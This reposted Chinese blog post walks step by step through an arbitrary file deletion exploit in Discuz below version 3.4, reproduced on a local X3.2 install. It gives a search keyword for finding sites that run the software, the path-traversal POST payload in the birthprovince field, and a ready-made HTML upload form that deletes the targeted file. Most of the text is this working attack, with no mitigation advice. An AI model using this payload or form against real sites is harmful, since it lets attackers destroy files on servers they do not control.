【研究】Discuz<3.4任意文件刪除漏洞


這里以Discuz3.2為例

關鍵字:
Powered by Discuz! X3.2

時間有限,就不一一截圖了,Discuz所有頁面全在Discuz_X3.2_SC_UTF8/upload/目錄下

利用過程:

訪問http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt試試,這是我虛機中discuz中robots的路徑,具體視個人情況而定

1、注冊個帳號

2、提交數據

url地址欄:http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/home.php?mod=spacecp&ac=profile&op=base
POST數據:birthprovince=../../../robots.txt&profilesubmit=1&formhash=2bc7eb9a,這個formhash的值可以從源代碼中找到,每次都不一樣的

3、提交數據之后,打開設置界面,可以看到出生地變成../../../robots.txt

4、構造上傳表單

<form action="http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/home.php?mod=spacecp&ac=profile&op=base" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="2bc7eb9a" /> //此formhash值和第三布formhash值一樣
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="submit" />
</form>
上傳成功后,返回空白頁面,然后訪問http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt,發現robots.txt已被刪除


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM